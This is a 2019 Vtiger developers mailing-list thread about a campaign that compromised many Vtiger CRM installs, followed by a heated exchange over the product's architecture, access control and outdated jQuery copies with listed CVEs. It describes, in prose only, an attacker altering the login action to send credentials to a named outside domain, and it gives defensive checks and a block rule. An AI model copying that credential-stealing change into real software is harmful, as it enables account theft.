[Vtigercrm-developers] Core

Prasad prasad at vtiger.com
Wed Jun 12 14:57:03 GMT 2019


Błażej,

*Preface*

I warn you, don’t read any further, it’s for your own good:)


I value your time spent on writing - so had to forego this warning :)

*Cooperation with the community and partners*

I hope you have sent pipeline enough merge requests for us to review.

*Core development*

> Everyone on this list knows that Vtiger doesn’t develop the core.


Thinking of making Vtiger the best is a daily-task (more than 14 years!).
Core of 7.x has evolved to a state which addresses many of business
use-cases.
Keeping history of development and consumers in mind moving with precaution
has always been adopted. Change of internals is the goal for 8.x.

*Security*

> how is a user supposed to know how to configure a web server if the
> application doesn’t enforce or control that?


Web-server (Apache) configuration and monitoring is external to product
documentation. (This is my understanding).

Data-security is always a top-priority and we have been very reactive on
releasing patches time-to-time
working with security advisories and community assistance.

How can you be convinced that the system doesn’t allow any unauthorized
> access to the data if you have access from the www level to ALL files, even
> these in the ADMINISTRATOR’S section? It’s enough that in one of the views
> permissions aren’t verified and you can have access to the entire system.


Can you please cite or file issue detail on code.vtiger.com so it can be
reviewed further.

Regarding CVE-2019-11358, CVE-2016-10707, CVE-2015-9251


Any browser (client) library would be running on top of Browser DOM API (if
I'm not wrong) so
would it mean jQuery latest version be more secure than jQuery older
version? Please correct me
if I did not understand your point.

When a user logs in there aren’t any permissions, you can get access to any
> record in the system from many places even if you normally don’t have
> access to them.

Access permissions aren’t centralized which makes it possible not to have
> permissions to something in one place, but have them in other places.


Access to endpoint points (UI / API) are checked - can you please cite more
example for this?

>
Regards,
Prasad
--
FB <http://www.facebook.com/vtiger> I Twit <http://twitter.com/vtigercrm> I
LIn <https://www.linkedin.com/company/1270573?trk=tyah> I Blog
<https://blogs.vtiger.com> I Website <https://www.vtiger.com/>



On Wed, Jun 12, 2019 at 6:27 PM Błażej Pabiszczak <
b.pabiszczak at yetiforce.com> wrote:

> *Preface*
>
> I’m sure some of you missed me, as always - I’ll say my piece and vanish
> for a few years to take care of some more important stuff. I divided the
> email into a few parts so everyone can find something for themselves,
> however, I warn you, don’t read any further, it’s for your own good:)
>
>
> *Cooperation with the community and partners*
>
> Since I remember (and that means more than 10 years) for some unknown to
> me reason, Vtiger has always ignored their community… at all possible
> layers, be it publishing modules in the store, or patching errors, or
> mailing list discussions. Questions were only answered in emergency
> situations (like now, where people start considering their own version of
> the system under a different name). I don’t know where it stems from, but
> Vtiger gained its popularity because it is open source, not the other way
> round, that’s why the community and partners should always be the priority.
> There weren’t so many systems some time ago, but now there are more than
> 1000 systems in the world and the number keeps growing daily. Basing
> business on software that is not supported by the producer (I’m talking
> about the open source version) will not be profitable. A simple example of
> that is how we described like 7 - 8 years ago that translations can’t
> combine different words but there have to be separate translations for each
> whole expression, otherwise the system would never be properly translated
> for many languages… and it still persists. How can you sell a system if it
> can’t even be translated? Just take a look at
> https://crowdin.com/project/suitecrmtranslations where the community
> contributes to more than 60 languages. How can you just reject this kind of
> free help and development? A professional translator would charge around
> $3.000-$4.000 for a single language, for 50 languages you’re saving
> $150.000 - $200.000.
>
>
> *Core development*
>
> Everyone on this list knows that Vtiger doesn’t develop the core. The
> problem can be noticed since at least version 5, although it probably
> existed earlier and I just don’t remember. Once in a blue moon (every 3-4
> yrs on average) Vtiger makes a quick update and releases a “new version”.
> Version 6 indeed introduced some crucial changes in MVC but it wasn’t a
> finished version (and still isn’t) and shouldn’t have been published.
> Version 6 was published haphazardly because nothing was done with version 5
> for around 3 years and the easiest solution was to copy stuff from the On
> Demand version… it was a marketing move that convinced many people who
> stayed here that this version was going to be updated...
>
> Unfortunately all the changes introduced for years (if there are any) only
> apply to the appearance and not core (framework), there are some funny
> attempts at supporting PHP 7 but it’s just cosmetics really (most of the
> errors are suppressed or ignored and none of the novelties in PHP are used)
>
> The truth is that the core is the type of architecture used 10 years ago…
> you add minor cosmetic changes just so it looks “sort of” decent, but what
> lies underneath is tragedy that nobody works on. How long can you ignore
> technological progress and when will the technological debt devour your
> system entirely?
>
>
> *Security*
>
> @Prasad how is a user supposed to know how to configure a web server if
> the application doesn’t enforce or control that? We were shown during our
> security audits that if a system doesn’t inform a user about wrong
> configuration then it is a breach of security - your audits don’t show
> these errors (these are basic assumptions for the app’s architecture
> according to OWASP ASVS).
>
> How can you be convinced that the system doesn’t allow any unauthorized
> access to the data if you have access from the www level to ALL files, even
> these in the ADMINISTRATOR’S section? It’s enough that in one of the views
> permissions aren’t verified and you can have access to the entire system.
>
> When a user logs in there aren’t any permissions, you can get access to
> any record in the system from many places even if you normally don’t have
> access to them. Access permissions aren’t centralized which makes it
> possible not to have permissions to something in one place, but have them
> in other places.
>
> There is no central PHP and JS library base in Vtiger which means that you
> don’t know how many and what kind of libraries there are in the system, and
> what’s more important, you don’t know how many of them have critical
> vulnerabilities. Last time I checked there over 60 outdated libraries in
> Vtiger itself and 55 of them had some critical vulnerabilities. A good
> example is jquery:
>
>    - jQuery v1.4.2 [kcfinder\js\jquery.js]
>    - jQuery v1.11.2
>    [\layouts\v7\lib\jquery\daterangepicker\jquery-1.11.2.min.js]
>    - jQuery v3.1.1 [\layouts\v7\lib\jquery\fullcalendar\lib\jquery.min.js]
>    - jQuery v1.11.0 [\layouts\v7\lib\jquery\jquery.min.js]
>    - jQuery v1.7.1
>    [\libraries\bootstrap\js\eternicode-bootstrap-datepicker\tests\assets\jquery-1.7.1.min.js]
>    - jQuery v1.7.1 [\libraries\bootstrap\js\tests\vendor\jquery.js]
>    - jQuery v1.3.2 [\libraries\jquery\colorpicker\js\jquery.js]
>    - jQuery v1.8.3 [\libraries\jquery\gantt\libs\jquery.1.8.js]
>    - jQuery v1.7 [\libraries\jquery\jquery.min.js]
>    - jQuery v1.4 [\libraries\jquery\multiplefileupload\jquery.js]
>    - jQuery v1.8.0 [\migrate\resources\js\jquery-min.js]
>    - jQuery v1.8.0 [\test\migration\js\jquery-min.js]
>
> So tell me honestly Prasad, what security are you talking about? If file
> access is public, if dozens of the same libraries in different versions
> with different vulnerabilities are in the system (eg.  CVE-2019-11358,
> CVE-2016-10707, CVE-2015-9251) then what security are we talking about?!
> From the programming perspective it’s impossible to guess what and where to
> use in a mess like this.
>
> *Documentation*
>
> I applaud you for the documentation, but the truth is that 3/4th of the
> system should be rewritten from scratch. Creating documentation for the
> current version makes no sense. And creating documentation without the
> producers makes even less sense. The documentation must be a part of the
> code production process, otherwise it will be worthless. The only right way
> is to create the documentation together or separate yourselves from Vtiger
> completely and make your own fork.
>
>
> *Summary*
>
> Vtiger, keep it up! You have taken a very good direction to destroy
> something you have been building for 15 years… With such pace of
> development in technology and programming companies, it isn’t a matter of
> 5-7 years but probably 2-3 when you notice a significant decrease of
> popularity and customers.
>
> --
>
> Błażej Pabiszczak
>
> 12 cze 2019 06:22 Prasad <prasad at vtiger.com> napisał(a):
>
> Just to be clear Vtiger CRM Product does not open up access to
> unauthorized users.
>
> We highly recommend to ensure web-server is setup with best-security
> practise
> and access restriction be applied whenever possible to deny attempts from
> untrusted
> source or users.
>
> It is also good to choose your hosting provider who has experience and
> follows
> best data-protection policies.
>
> Regards,
> Prasad
> --
> FB <http://www.facebook.com/vtiger> I Twit <http://twitter.com/vtigercrm>
>  I LIn <https://www.linkedin.com/company/1270573?trk=tyah> I Blog
> <https://blogs.vtiger.com> I Website <https://www.vtiger.com/>
>
>
> On Tue, Jun 11, 2019 at 10:01 PM nilay khatri <nilay.spartan at gmail.com>
> wrote:
>
> I am not sure how many service providers have been affected from a hacking
> attack.
>
> But there is some one notorious who is targeting Vtiger Open Source
> installations.
>
> We have received requests from over 250 Vtiger Open Source users to check
> the installations, as they have been compromised and it presents a yellow
> Screen with some sort of message.
>
> One common thing which we have observed is that the attacker modifies the
> Login action and adds code to send user's login information to
> vtigersupport.com .
>
> We have informed Vtiger team as well about this and request the whole
> community to have a check on the CRM installations done by them and to set
> up rule to block any network traffic to vtigersupport.com.
>
> Also look for the following:
>
> 1. if there is any occurrence of VGS Document Manager module, if you have
> not installed it explicitly. Make sure if you have installed it, the file
> permissions are good so that users can not explore any files on server
> which they are not supposed to. (No hard feelings, VGS/Maggi)
>
> 2. Check for any malicious file in WSAPP, SMSNotifer modules directory and
> language folders
>
> If possible and not required, disable the option to import zip files form
> Module Manager
>
> We will be sharing more information on this soon and also with a security
> update.
>
> -Nilay
> _______________________________________________
> http://www.vtiger.com/
>
>
> _______________________________________________
> http://www.vtiger.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.vtigercrm.com/pipermail/vtigercrm-developers/attachments/20190612/75c6f2d2/attachment-0001.html>


More information about the vtigercrm-developers mailing list